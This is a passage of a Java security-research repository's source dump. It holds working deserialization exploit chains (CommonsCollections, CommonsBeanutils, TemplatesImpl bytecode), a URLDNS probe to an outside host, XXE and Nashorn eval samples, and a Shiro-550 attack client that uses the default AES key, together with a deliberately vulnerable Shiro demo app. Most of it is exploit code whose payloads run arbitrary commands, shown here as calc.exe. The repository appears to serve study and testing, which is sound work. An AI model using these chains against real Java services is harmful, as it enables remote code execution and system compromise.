Base64.decodeBase64("yv66vgAAADQAIQoABgASCQATABQIABUKABYAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEAClNvdXJjZUZpbGUBABdIZWxsb1RlbXBsYXRlc0ltcGwuamF2YQwADgAPBwAbDAAcAB0BABNIZWxsbyBUZW1wbGF0ZXNJbXBsBwAeDAAfACABABJIZWxsb1RlbXBsYXRlc0ltcGwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAIAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAACgALAAAABAABAAwAAQAOAA8AAQAJAAAALQACAAEAAAANKrcAAbIAAhIDtgAEsQAAAAEACgAAAA4AAwAAAA0ABAAOAAwADwABABAAAAACABE="); 37 | TemplatesImpl obj = new TemplatesImpl(); 38 | setFieldValue(obj, "_bytecodes", new byte[][]{code}); 39 | setFieldValue(obj, "_name", "HelloTemplatesImpl"); 40 | setFieldValue(obj, "_tfactory", new TransformerFactoryImpl()); 41 | 42 | Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)}; 43 | Transformer[] transformers = new Transformer[]{ 44 | new ConstantTransformer(obj), 45 | new InvokerTransformer("newTransformer", null, null) 46 | }; 47 | 48 | Transformer transformerChain = new ChainedTransformer(transformers); 49 | 50 | Map innerMap = new HashMap(); 51 | innerMap.put("value", "xxxx"); 52 | Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain); 53 | 54 | Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler"); 55 | Constructor construct = clazz.getDeclaredConstructor(Class.class, Map.class); 56 | construct.setAccessible(true); 57 | InvocationHandler handler = (InvocationHandler) construct.newInstance(Retention.class, outerMap); 58 | 59 | // ================== 60 | // 生成序列化字符串 61 | ByteArrayOutputStream barr = new ByteArrayOutputStream(); 62 | ObjectOutputStream oos = new ObjectOutputStream(barr); 63 | oos.writeObject(handler); 64 | oos.close(); 65 | 66 | // 本地测试触发 67 | // System.out.println(barr); 68 | ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray())); 69 | Object o = (Object) ois.readObject(); 70 | } 71 | } 72 | -------------------------------------------------------------------------------- /jdk8/src/main/java/com/govuln/deserialization/URLDNS.java: -------------------------------------------------------------------------------- 1 | package com.govuln.deserialization; 2 | 3 | import java.io.*; 4 | import java.lang.reflect.Field; 5 | import java.net.InetAddress; 6 | import java.net.URL; 7 | import java.net.URLConnection; 8 | import java.net.URLStreamHandler; 9 | import java.util.HashMap; 10 | 11 | public class URLDNS { 12 | 13 | static class SilentURLStreamHandler extends URLStreamHandler { 14 | 15 | protected URLConnection openConnection(URL u) throws IOException { 16 | return null; 17 | } 18 | 19 | protected synchronized InetAddress getHostAddress(URL u) { 20 | return null; 21 | } 22 | } 23 | 24 | public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { 25 | Field field = obj.getClass().getDeclaredField(fieldName); 26 | field.setAccessible(true); 27 | field.set(obj, value); 28 | } 29 | 30 | public static void main(String []args) throws Exception { 31 | String url = "http://dns.675ba661.y7z.xyz"; 32 | 33 | //Avoid DNS resolution during payload creation 34 | //Since the field java.net.URL.handler is transient, it will not be part of the serialized payload. 35 | URLStreamHandler handler = new SilentURLStreamHandler(); 36 | 37 | HashMap ht = new HashMap(); // HashMap that will contain the URL 38 | URL u = new URL(null, url, handler); // URL to use as the Key 39 | ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup. 40 | 41 | setFieldValue(u, "hashCode", -1); 42 | 43 | ByteArrayOutputStream barr = new ByteArrayOutputStream(); 44 | ObjectOutputStream oos = new ObjectOutputStream(barr); 45 | oos.writeObject(ht); 46 | oos.close(); 47 | 48 | System.out.println(barr); 49 | ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray())); 50 | Object o = (Object)ois.readObject(); 51 | } 52 | } 53 | -------------------------------------------------------------------------------- /jdk8/src/main/java/com/govuln/js/Eval.java: -------------------------------------------------------------------------------- 1 | package com.govuln.js; 2 | 3 | import javax.script.ScriptEngine; 4 | import javax.script.ScriptEngineManager; 5 | import java.io.FileReader; 6 | 7 | import jdk.nashorn.api.scripting.NashornException; 8 | import jdk.nashorn.api.scripting.NashornScriptEngine; 9 | import jdk.nashorn.api.scripting.NashornScriptEngineFactory; 10 | 11 | import java.io.InputStream; 12 | import java.lang.Exception; 13 | 14 | public class Eval { 15 | public static void main(String[] args) throws Exception { 16 | ScriptEngineManager manager = new ScriptEngineManager(); 17 | ScriptEngine engine = manager.getEngineByName("JavaScript"); 18 | engine.eval(new FileReader("src/main/resources/eval.js")); 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /jdk8/src/main/java/com/govuln/serialization/Converter.java: -------------------------------------------------------------------------------- 1 | package com.govuln.serialization; 2 | 3 | import java.io.ByteArrayOutputStream; 4 | import java.io.DataOutputStream; 5 | import java.io.IOException; 6 | import java.io.ObjectOutputStream; 7 | 8 | public class Converter { 9 | public static byte[] toBytes(Object[] objs) throws IOException { 10 | ByteArrayOutputStream baos = new ByteArrayOutputStream(); 11 | DataOutputStream dos = new DataOutputStream(baos); 12 | for (Object obj : objs) { 13 | treatObject(dos, obj); 14 | } 15 | dos.close(); 16 | return baos.toByteArray(); 17 | } 18 | 19 | public static void treatObject(DataOutputStream dos, Object obj) 20 | throws IOException { 21 | if (obj instanceof Byte) { 22 | dos.writeByte((Byte) obj); 23 | } else if (obj instanceof Short) { 24 | dos.writeShort((Short) obj); 25 | } else if (obj instanceof Integer) { 26 | dos.writeInt((Integer) obj); 27 | } else if (obj instanceof Long) { 28 | dos.writeLong((Long) obj); 29 | } else if (obj instanceof String) { 30 | dos.writeUTF((String) obj); 31 | } else { 32 | ByteArrayOutputStream ba = new ByteArrayOutputStream(); 33 | ObjectOutputStream oos = new ObjectOutputStream(ba); 34 | oos.writeObject(obj); 35 | oos.close(); 36 | dos.write(ba.toByteArray(), 4, ba.size() - 4); // 4 = skip the header 37 | } 38 | } 39 | } 40 | -------------------------------------------------------------------------------- /jdk8/src/main/java/com/govuln/serialization/UserSerialization.java: -------------------------------------------------------------------------------- 1 | package com.govuln.serialization; 2 | 3 | import com.govuln.serialization.model.User; 4 | import org.apache.commons.codec.binary.Base64; 5 | 6 | import java.io.*; 7 | 8 | public class UserSerialization { 9 | public static void main(String[] args) throws Exception 10 | { 11 | write(); 12 | } 13 | 14 | public static void write() throws Exception 15 | { 16 | User user = new User("Bob"); 17 | user.setParent(new User("Josua")); 18 | ByteArrayOutputStream byteSteam = new ByteArrayOutputStream(); 19 | ObjectOutputStream oos = new ObjectOutputStream(byteSteam); 20 | oos.writeObject(user); 21 | 22 | System.out.println(Base64.encodeBase64String(byteSteam.toByteArray())); 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /jdk8/src/main/java/com/govuln/serialization/model/User.java: -------------------------------------------------------------------------------- 1 | package com.govuln.serialization.model; 2 | 3 | import java.io.Serializable; 4 | 5 | public class User implements Serializable { 6 | protected String name; 7 | protected User parent; 8 | 9 | public User(String name) 10 | { 11 | this.name = name; 12 | } 13 | 14 | public void setParent(User parent) 15 | { 16 | this.parent = parent; 17 | } 18 | } 19 | -------------------------------------------------------------------------------- /jdk8/src/main/java/com/govuln/xxe/DocumentBuilderExample.java: -------------------------------------------------------------------------------- 1 | package com.govuln.xxe; 2 | 3 | import org.w3c.dom.Document; 4 | import javax.xml.parsers.DocumentBuilder; 5 | import javax.xml.parsers.DocumentBuilderFactory; 6 | import java.io.ByteArrayInputStream; 7 | 8 | public class DocumentBuilderExample { 9 | public static void main(String[] args) throws Exception { 10 | String data = "\n" + 11 | " ]>\n" + 13 | "&xxe;"; 14 | DocumentBuilder db = DocumentBuilderFactory.newInstance().newDocumentBuilder(); 15 | Document doc = db.parse(new ByteArrayInputStream(data.getBytes())); 16 | System.out.println(doc.getDocumentElement().getTextContent()); 17 | } 18 | } 19 | -------------------------------------------------------------------------------- /jdk8/src/main/java/com/govuln/xxe/SAXParserExample.java: -------------------------------------------------------------------------------- 1 | package com.govuln.xxe; 2 | 3 | import org.xml.sax.helpers.DefaultHandler; 4 | 5 | import javax.xml.parsers.SAXParser; 6 | import javax.xml.parsers.SAXParserFactory; 7 | import java.io.ByteArrayInputStream; 8 | 9 | public class SAXParserExample { 10 | public static void main(String[] args) throws Exception { 11 | String data = "\n" + 12 | " ]>\n" + 14 | "&xxe;"; 15 | SAXParser parser = SAXParserFactory.newInstance().newSAXParser(); 16 | 17 | parser.parse(new ByteArrayInputStream(data.getBytes()), new DefaultHandler() { 18 | public void characters(char[] ch, int start, int length) { 19 | System.out.print(new String(ch, start, length)); 20 | } 21 | }); 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /jdk8/src/main/java/com/govuln/xxe/XMLReaderExample.java: -------------------------------------------------------------------------------- 1 | package com.govuln.xxe; 2 | 3 | import org.xml.sax.InputSource; 4 | import org.xml.sax.XMLReader; 5 | import org.xml.sax.helpers.DefaultHandler; 6 | import org.xml.sax.helpers.XMLReaderFactory; 7 | 8 | public class XMLReaderExample { 9 | public static void main(String[] args) throws Exception { 10 | String data = "\n" + 11 | " ]>\n" + 13 | "&xxe;"; 14 | XMLReader reader = XMLReaderFactory.createXMLReader(); 15 | reader.setContentHandler(new DefaultHandler() { 16 | public void characters(char[] ch, int start, int length) { 17 | System.out.print(new String(ch, start, length)); 18 | } 19 | }); 20 | reader.parse(new InputSource(data)); 21 | } 22 | } 23 | -------------------------------------------------------------------------------- /jdk8/src/main/java/com/govuln/xxe/XMLStreamExample.java: -------------------------------------------------------------------------------- 1 | package com.govuln.xxe; 2 | 3 | import javax.xml.stream.XMLInputFactory; 4 | import javax.xml.stream.XMLStreamReader; 5 | import java.io.*; 6 | 7 | public class XMLStreamExample { 8 | public static void main(String[] args) throws Exception { 9 | String data = "\n" + 10 | " ]>\n" + 12 | "&xxe;"; 13 | InputStream input = new ByteArrayInputStream(data.getBytes()); 14 | XMLInputFactory factory = XMLInputFactory.newFactory(); 15 | XMLStreamReader reader = factory.createXMLStreamReader(input); 16 | 17 | while (reader.hasNext()) { 18 | reader.next(); 19 | if (reader.isStartElement()) { 20 | System.out.println("Start: " + reader.getLocalName()); 21 | } else if (reader.isEndElement()) { 22 | System.out.println("End: " + reader.getLocalName()); 23 | } else if (reader.hasText()) { 24 | System.out.println("Data: " + reader.getText().trim()); 25 | } 26 | } 27 | } 28 | } 29 | -------------------------------------------------------------------------------- /jdk8/src/main/java/com/govuln/xxe/XPathExpressionExample.java: -------------------------------------------------------------------------------- 1 | package com.govuln.xxe; 2 | 3 | import org.xml.sax.InputSource; 4 | import javax.xml.xpath.XPath; 5 | import javax.xml.xpath.XPathExpression; 6 | import javax.xml.xpath.XPathFactory; 7 | import java.io.ByteArrayInputStream; 8 | 9 | public class XPathExpressionExample { 10 | public static void main(String[] args) throws Exception { 11 | String data = "\n" + 12 | " ]>\n" + 14 | "&xxe;"; 15 | XPathFactory xPathFactory = XPathFactory.newInstance(); 16 | XPath xpath = xPathFactory.newXPath(); 17 | XPathExpression xPathExpr = xpath.compile("/foo/text()"); 18 | 19 | String result = xPathExpr.evaluate(new InputSource(data)); 20 | System.out.println(result); 21 | } 22 | } 23 | -------------------------------------------------------------------------------- /jdk8/src/main/java/evil/EvilTemplatesImpl.java: -------------------------------------------------------------------------------- 1 | package evil; 2 | 3 | import com.sun.org.apache.xalan.internal.xsltc.DOM; 4 | import com.sun.org.apache.xalan.internal.xsltc.TransletException; 5 | import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; 6 | import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; 7 | import com.sun.org.apache.xml.internal.serializer.SerializationHandler; 8 | 9 | public class EvilTemplatesImpl extends AbstractTranslet { 10 | public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {} 11 | 12 | public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {} 13 | 14 | public EvilTemplatesImpl() throws Exception { 15 | super(); 16 | System.out.println("Hello TemplatesImpl"); 17 | Runtime.getRuntime().exec("calc.exe"); 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /jdk8/src/main/java/evil/Hello.java: -------------------------------------------------------------------------------- 1 | package evil; 2 | 3 | public class Hello { 4 | static { 5 | System.out.println("Hello World"); 6 | } 7 | } 8 | -------------------------------------------------------------------------------- /jdk8/src/main/resources/eval.js: -------------------------------------------------------------------------------- 1 | var a = new java.beans.Customizer { 2 | setObject: eval 3 | } 4 | a.object = "java.lang.Runtime.getRuntime\50\51.exec\50'calc.exe'\51"; -------------------------------------------------------------------------------- /shiroattack/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 5 | 4.0.0 6 | 7 | com.govuln 8 | shiroattack 9 | 1.0-SNAPSHOT 10 | 11 | shiroattack 12 | 13 | http://www.example.com 14 | 15 | 16 | UTF-8 17 | 1.8 18 | 1.8 19 | 20 | 21 | 22 | 23 | org.apache.shiro 24 | shiro-core 25 | 1.2.4 26 | 27 | 28 | 29 | org.javassist 30 | javassist 31 | 3.27.0-GA 32 | 33 | 34 | 35 | commons-collections 36 | commons-collections 37 | 3.2.1 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | maven-clean-plugin 47 | 3.1.0 48 | 49 | 50 | 51 | maven-resources-plugin 52 | 3.0.2 53 | 54 | 55 | maven-compiler-plugin 56 | 3.8.0 57 | 58 | 59 | maven-surefire-plugin 60 | 2.22.1 61 | 62 | 63 | maven-jar-plugin 64 | 3.0.2 65 | 66 | 67 | maven-install-plugin 68 | 2.5.2 69 | 70 | 71 | maven-deploy-plugin 72 | 2.8.2 73 | 74 | 75 | 76 | maven-site-plugin 77 | 3.7.1 78 | 79 | 80 | maven-project-info-reports-plugin 81 | 3.0.0 82 | 83 | 84 | 85 | 86 | 87 | org.apache.maven.plugins 88 | maven-compiler-plugin 89 | 90 | 8 91 | 8 92 | 93 | 94 | 95 | 96 | 97 | -------------------------------------------------------------------------------- /shiroattack/shiroattack.iml: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /shiroattack/src/main/java/com/govuln/shiroattack/Client.java: -------------------------------------------------------------------------------- 1 | package com.govuln.shiroattack; 2 | 3 | import javassist.ClassPool; 4 | import javassist.CtClass; 5 | import org.apache.shiro.crypto.AesCipherService; 6 | import org.apache.shiro.util.ByteSource; 7 | 8 | public class Client { 9 | public static void main(String []args) throws Exception { 10 | ClassPool pool = ClassPool.getDefault(); 11 | CtClass clazz = pool.get(com.govuln.shiroattack.Evil.class.getName()); 12 | byte[] payloads = new CommonsCollectionsShiro().getPayload(clazz.toBytecode()); 13 | 14 | AesCipherService aes = new AesCipherService(); 15 | byte[] key = java.util.Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA=="); 16 | 17 | ByteSource ciphertext = aes.encrypt(payloads, key); 18 | System.out.printf(ciphertext.toString()); 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /shiroattack/src/main/java/com/govuln/shiroattack/Client0.java: -------------------------------------------------------------------------------- 1 | package com.govuln.shiroattack; 2 | 3 | import org.apache.shiro.crypto.AesCipherService; 4 | import org.apache.shiro.util.ByteSource; 5 | 6 | public class Client0 { 7 | public static void main(String []args) throws Exception { 8 | byte[] payloads = new CommonsCollections6().getPayload("calc.exe"); 9 | AesCipherService aes = new AesCipherService(); 10 | byte[] key = java.util.Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA=="); 11 | 12 | ByteSource ciphertext = aes.encrypt(payloads, key); 13 | System.out.printf(ciphertext.toString()); 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /shiroattack/src/main/java/com/govuln/shiroattack/Client1.java: -------------------------------------------------------------------------------- 1 | package com.govuln.shiroattack; 2 | 3 | import javassist.ClassPool; 4 | import javassist.CtClass; 5 | import org.apache.shiro.crypto.AesCipherService; 6 | import org.apache.shiro.util.ByteSource; 7 | 8 | public class Client1 { 9 | public static void main(String []args) throws Exception { 10 | ClassPool pool = ClassPool.getDefault(); 11 | CtClass clazz = pool.get(com.govuln.shiroattack.Evil.class.getName()); 12 | byte[] payloads = new CommonsBeanutils1Shiro().getPayload(clazz.toBytecode()); 13 | 14 | AesCipherService aes = new AesCipherService(); 15 | byte[] key = java.util.Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA=="); 16 | 17 | ByteSource ciphertext = aes.encrypt(payloads, key); 18 | System.out.printf(ciphertext.toString()); 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /shiroattack/src/main/java/com/govuln/shiroattack/CommonsBeanutils1Shiro.java: -------------------------------------------------------------------------------- 1 | package com.govuln.shiroattack; 2 | 3 | import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; 4 | import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; 5 | import org.apache.commons.beanutils.BeanComparator; 6 | 7 | import java.io.ByteArrayOutputStream; 8 | import java.io.ObjectOutputStream; 9 | import java.lang.reflect.Field; 10 | import java.util.PriorityQueue; 11 | 12 | public class CommonsBeanutils1Shiro { 13 | public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { 14 | Field field = obj.getClass().getDeclaredField(fieldName); 15 | field.setAccessible(true); 16 | field.set(obj, value); 17 | } 18 | 19 | public byte[] getPayload(byte[] clazzBytes) throws Exception { 20 | TemplatesImpl obj = new TemplatesImpl(); 21 | setFieldValue(obj, "_bytecodes", new byte[][]{clazzBytes}); 22 | setFieldValue(obj, "_name", "HelloTemplatesImpl"); 23 | setFieldValue(obj, "_tfactory", new TransformerFactoryImpl()); 24 | 25 | final BeanComparator comparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER); 26 | final PriorityQueue queue = new PriorityQueue(2, comparator); 27 | // stub data for replacement later 28 | queue.add("1"); 29 | queue.add("1"); 30 | 31 | setFieldValue(comparator, "property", "outputProperties"); 32 | setFieldValue(queue, "queue", new Object[]{obj, obj}); 33 | 34 | // ================== 35 | // 生成序列化字符串 36 | ByteArrayOutputStream barr = new ByteArrayOutputStream(); 37 | ObjectOutputStream oos = new ObjectOutputStream(barr); 38 | oos.writeObject(queue); 39 | oos.close(); 40 | 41 | return barr.toByteArray(); 42 | } 43 | } 44 | -------------------------------------------------------------------------------- /shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollections6.java: -------------------------------------------------------------------------------- 1 | package com.govuln.shiroattack; 2 | 3 | import org.apache.commons.collections.Transformer; 4 | import org.apache.commons.collections.functors.ChainedTransformer; 5 | import org.apache.commons.collections.functors.ConstantTransformer; 6 | import org.apache.commons.collections.functors.InvokerTransformer; 7 | import org.apache.commons.collections.keyvalue.TiedMapEntry; 8 | import org.apache.commons.collections.map.LazyMap; 9 | 10 | import java.io.ByteArrayOutputStream; 11 | import java.io.ObjectOutputStream; 12 | import java.lang.reflect.Field; 13 | import java.util.HashMap; 14 | import java.util.Map; 15 | 16 | 17 | public class CommonsCollections6 { 18 | public byte[] getPayload(String command) throws Exception { 19 | Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)}; 20 | Transformer[] transformers = new Transformer[] { 21 | new ConstantTransformer(Runtime.class), 22 | new InvokerTransformer("getMethod", new Class[] { String.class, 23 | Class[].class }, new Object[] { "getRuntime", 24 | new Class[0] }), 25 | new InvokerTransformer("invoke", new Class[] { Object.class, 26 | Object[].class }, new Object[] { null, new Object[0] }), 27 | new InvokerTransformer("exec", new Class[] { String.class }, 28 | new String[] { command }), 29 | new ConstantTransformer(1), 30 | }; 31 | Transformer transformerChain = new ChainedTransformer(fakeTransformers); 32 | 33 | // 不再使用原CommonsCollections6中的HashSet,直接使用HashMap 34 | Map innerMap = new HashMap(); 35 | Map outerMap = LazyMap.decorate(innerMap, transformerChain); 36 | 37 | TiedMapEntry tme = new TiedMapEntry(outerMap, "keykey"); 38 | 39 | Map expMap = new HashMap(); 40 | expMap.put(tme, "valuevalue"); 41 | 42 | outerMap.remove("keykey"); 43 | 44 | Field f = ChainedTransformer.class.getDeclaredField("iTransformers"); 45 | f.setAccessible(true); 46 | f.set(transformerChain, transformers); 47 | 48 | ByteArrayOutputStream barr = new ByteArrayOutputStream(); 49 | ObjectOutputStream oos = new ObjectOutputStream(barr); 50 | oos.writeObject(expMap); 51 | oos.close(); 52 | 53 | return barr.toByteArray(); 54 | } 55 | } 56 | -------------------------------------------------------------------------------- /shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollectionsShiro.java: -------------------------------------------------------------------------------- 1 | package com.govuln.shiroattack; 2 | 3 | import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; 4 | import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; 5 | import org.apache.commons.collections.Transformer; 6 | import org.apache.commons.collections.functors.InvokerTransformer; 7 | import org.apache.commons.collections.keyvalue.TiedMapEntry; 8 | import org.apache.commons.collections.map.LazyMap; 9 | 10 | import java.io.ByteArrayOutputStream; 11 | import java.io.ObjectOutputStream; 12 | import java.lang.reflect.Field; 13 | import java.util.HashMap; 14 | import java.util.Map; 15 | 16 | public class CommonsCollectionsShiro { 17 | public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { 18 | Field field = obj.getClass().getDeclaredField(fieldName); 19 | field.setAccessible(true); 20 | field.set(obj, value); 21 | } 22 | 23 | public byte[] getPayload(byte[] clazzBytes) throws Exception { 24 | TemplatesImpl obj = new TemplatesImpl(); 25 | setFieldValue(obj, "_bytecodes", new byte[][]{clazzBytes}); 26 | setFieldValue(obj, "_name", "HelloTemplatesImpl"); 27 | setFieldValue(obj, "_tfactory", new TransformerFactoryImpl()); 28 | 29 | Transformer transformer = new InvokerTransformer("getClass", null, null); 30 | 31 | Map innerMap = new HashMap(); 32 | Map outerMap = LazyMap.decorate(innerMap, transformer); 33 | 34 | TiedMapEntry tme = new TiedMapEntry(outerMap, obj); 35 | 36 | Map expMap = new HashMap(); 37 | expMap.put(tme, "valuevalue"); 38 | 39 | outerMap.clear(); 40 | setFieldValue(transformer, "iMethodName", "newTransformer"); 41 | 42 | // ================== 43 | // 生成序列化字符串 44 | ByteArrayOutputStream barr = new ByteArrayOutputStream(); 45 | ObjectOutputStream oos = new ObjectOutputStream(barr); 46 | oos.writeObject(expMap); 47 | oos.close(); 48 | 49 | return barr.toByteArray(); 50 | } 51 | } -------------------------------------------------------------------------------- /shiroattack/src/main/java/com/govuln/shiroattack/Evil.java: -------------------------------------------------------------------------------- 1 | package com.govuln.shiroattack; 2 | 3 | import com.sun.org.apache.xalan.internal.xsltc.DOM; 4 | import com.sun.org.apache.xalan.internal.xsltc.TransletException; 5 | import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; 6 | import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; 7 | import com.sun.org.apache.xml.internal.serializer.SerializationHandler; 8 | 9 | public class Evil extends AbstractTranslet { 10 | public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {} 11 | 12 | public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {} 13 | 14 | public Evil() throws Exception { 15 | super(); 16 | System.out.println("Hello TemplatesImpl"); 17 | Runtime.getRuntime().exec("calc.exe"); 18 | } 19 | } -------------------------------------------------------------------------------- /shirodemo/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 5 | 4.0.0 6 | 7 | com.govuln 8 | shirodemo 9 | 1.0-SNAPSHOT 10 | war 11 | 12 | shirodemo Maven Webapp 13 | http://www.example.com 14 | 15 | 16 | UTF-8 17 | 1.7 18 | 1.7 19 | 20 | 21 | 22 | 23 | org.apache.shiro 24 | shiro-core 25 | 1.2.4 26 | 27 | 28 | org.apache.shiro 29 | shiro-web 30 | 1.2.4 31 | 32 | 33 | 34 | javax.servlet 35 | javax.servlet-api 36 | 3.1.0 37 | provided 38 | 39 | 40 | 41 | javax.servlet.jsp 42 | jsp-api 43 | 2.2 44 | provided 45 | 46 | 47 | 48 | 49 | commons-collections 50 | commons-collections 51 | 3.2.1 52 | 53 | 54 | 55 | commons-logging 56 | commons-logging 57 | 1.2 58 | 59 | 60 | org.slf4j 61 | slf4j-api 62 | 1.7.30 63 | 64 | 65 | org.slf4j 66 | slf4j-simple 67 | 1.7.30 68 | 69 | 70 | 71 | 72 | 73 | shirodemo 74 | 75 | 76 | 77 | maven-clean-plugin 78 | 3.1.0 79 | 80 | 81 | 82 | maven-resources-plugin 83 | 3.0.2 84 | 85 | 86 | maven-compiler-plugin 87 | 3.8.0 88 | 89 | 90 | maven-surefire-plugin 91 | 2.22.1 92 | 93 | 94 | maven-war-plugin 95 | 3.2.2 96 | 97 | 98 | maven-install-plugin 99 | 2.5.2 100 | 101 | 102 | maven-deploy-plugin 103 | 2.8.2 104 | 105 | 106 | 107 | 108 | 109 | -------------------------------------------------------------------------------- /shirodemo/shirodemo.iml: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /shirodemo/src/main/webapp/WEB-INF/shiro.ini: -------------------------------------------------------------------------------- 1 | [main] 2 | shiro.loginUrl = /login.jsp 3 | 4 | [users] 5 | # format: username = password, role1, role2, ..., roleN 6 | root = secret,admin 7 | guest = guest,guest 8 | 9 | [roles] 10 | # format: roleName = permission1, permission2, ..., permissionN 11 | admin = * 12 | 13 | [urls] 14 | # The /login.jsp is not restricted to authenticated users (otherwise no one could log in!), but 15 | # the 'authc' filter must still be specified for it so it can process that url's 16 | # login submissions. It is 'smart' enough to allow those requests through as specified by the 17 | # shiro.loginUrl above. 18 | /login.jsp = authc 19 | /logout = logout 20 | /** = user 21 | -------------------------------------------------------------------------------- /shirodemo/src/main/webapp/WEB-INF/web.xml: -------------------------------------------------------------------------------- 1 | 4 | 5 | 8 | 9 | 10 | org.apache.shiro.web.env.EnvironmentLoaderListener 11 | 12 | 13 | 14 | ShiroFilter 15 | org.apache.shiro.web.servlet.ShiroFilter 16 | 17 | 18 | 19 | ShiroFilter 20 | /* 21 | 22 | 23 | 24 | index.jsp 25 | 26 | 27 | -------------------------------------------------------------------------------- /shirodemo/src/main/webapp/index.jsp: -------------------------------------------------------------------------------- 1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %> 2 | 3 | 4 | 5 | 6 | Congrats 7 | 8 | 9 | 10 |

Congrats

11 |

You have successfully logged in

12 | 13 | 14 | -------------------------------------------------------------------------------- /shirodemo/src/main/webapp/login.jsp: -------------------------------------------------------------------------------- 1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %> 2 | 3 | 4 | 5 | 6 | Login Page 7 | 8 | 69 | 70 | 71 | 84 | 85 | --------------------------------------------------------------------------------